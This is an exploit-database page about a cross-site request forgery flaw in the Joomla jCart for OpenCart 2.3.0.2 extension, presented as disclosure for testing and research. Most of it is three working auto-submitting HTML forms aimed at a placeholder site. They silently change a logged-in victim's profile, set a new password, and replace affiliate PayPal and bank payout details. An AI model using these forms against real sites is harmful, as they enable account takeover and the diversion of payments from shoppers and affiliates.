Advertisement






Joomla! Component jCart for OpenCart 2.3.0.2 Cross-Site Request Forgery

CVE Category Price Severity
N/A CWE-352 N/A High
Author Risk Exploitation Type Date
ExploitAlert High Remote 2018-05-30
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02565 0.54005

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018050299

Below is a copy:

Joomla! Component jCart for OpenCart 2.3.0.2 Cross-Site Request Forgery
# Exploit Title: Joomla! extension jCart for OpenCart 2.3.0.2 - Cross site request forgery
# Date: 2018-05-28
# Exploit Author: L0RD or [email protected]
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 2.3.0.2
# Tested on: Kali linux
===================================================

# POC :

# Change user information exploit :

<html>
  <body>
    <form action="http://site.com/jcart/account/edit.html" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="firstname" value="D3C0DE" />
      <input type="hidden" name="lastname" value="revenge" />
      <input type="hidden" name="email" value="decod3.n@gmail.com" />
      <input type="hidden" name="telephone" value="100000" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>


# Change password exploit :

<form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="password" value="2468" />
      <input type="hidden" name="confirm" value="2468" />
</form>
<script>
   document.forms[0].submit();
</script>


# Change affiliate account information exploit :

 <form action="http://site.com/jcart/account/affiliate/edit.html" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="company" value="decode" />
      <input type="hidden" name="website" value="test.com" />
      <input type="hidden" name="tax" value="100000000" />
      <input type="hidden" name="payment" value="paypal" />
      <input type="hidden" name="cheque" value="
" />
      <input type="hidden" name="paypal" value="test@test.com" />
      <input type="hidden" name="bank_name" value="
" />
      <input type="hidden" name="bank_branch_number" value="
"/>
      <input type="hidden" name="bank_swift_code" value="
" />
      <input type="hidden" name="bank_account_name" value="
" />
      <input type="hidden" name="bank_account_number" value="
"/>
    </form>
    <script>
        document.forms[0].submit();
    </script>

====================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum